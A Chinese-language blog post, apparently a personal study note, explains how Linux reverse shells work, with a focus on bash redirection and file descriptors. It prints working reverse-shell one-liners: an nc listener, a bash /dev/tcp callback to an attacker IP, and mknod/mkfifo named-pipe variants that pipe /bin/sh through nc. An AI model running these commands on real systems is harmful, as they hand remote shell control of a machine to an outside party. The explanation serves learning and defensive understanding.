Linux反弹shell中重定向的理解(个人见底、方家斧正)

Linux反弹shell

攻击机执行命令(IP:192.168.59.128):

nc -l -vv -p 1234

靶机执行命令:

bash -i &> /dev/tcp/192.168.59.128/1234 0>&1

攻击机执行命令中:

  1. -l 开启连接监听(TCP)
  2. -vv 详细信息(不是我写错了,可以是双V,展示更详细信息)
  3. -p 靶机连接攻击机的端口号

靶机执行命令中:

  1. 一共有两个命令bash -i 和 /dev/tcp/192.168.59.128/1234
  2. bash -i 打开一个交互的shell
  3. /dev/tcp/192.168.59.128/1234 建立TCP连接

现在有两个问题要解决。
1、两个命令连接。
2、向shell的输入数据传递和shell回显数据传递问题。
这是就会发现Linux重定向的妙用。使用 >& 将两个命令连接(可以理解将标准输出和错误重定向到TCP连接),使用0<&1将输入重定向到输出。
至于说为什么不使用>,可以参考:
https://www.runoob.com/linux/linux-shell-io-redirections.html
https://www.freebuf.com/articles/system/153986.html
https://www.anquanke.com/post/id/85712
其实以上都是对于其他博文的理解与整合,不算自己的。
针对于第三篇博文所述

bash -i &> /dev/tcp/192.168.59.128/1234 0<&1
bash -i &> /dev/tcp/192.168.59.128/1234 0>&1

两个命令执行都能反弹获得shell,个人理解:文件描述符 0 通常是标准输入(STDIN),1 是标准输出(STDOUT),2 是标准错误输出(STDERR),由于在TCP连接建立后,标准输入输出端均已确定,所以我猜测无论重定向方向如何,只能是一个输入一个输出,所以重定向中>符号的方向不影响结果。

常见反弹shell姿势:

root@kali:~# mknod /tmp/backpipe p                        #root权限执行
root@kali:~# /bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe

backpipe是一个设备文件,创建管道所必须的。第二条命令中先将/bin/sh 的输入重定向到管道,再将nc连接端口的输出重定向到管道。可以用下图来理解。我曾尝试同时输出错误信息,但没成功,路过的大佬知道可以讲下。
在这里插入图片描述在这里插入图片描述

 root@kali:~# mkfifo /tmp/backpipe p                 #没有root权限情况下可以使用该命令
 root@kali:~# /bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe
 

tips:
1、mkfifo与mknod均为创建管道命令的两种方法,使用权限高低而已。
2、由于时间关系,环境测试不是同一个IP,可能有变动。
3、以上均为个人理解,如有错误还希望各位不吝赐教。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值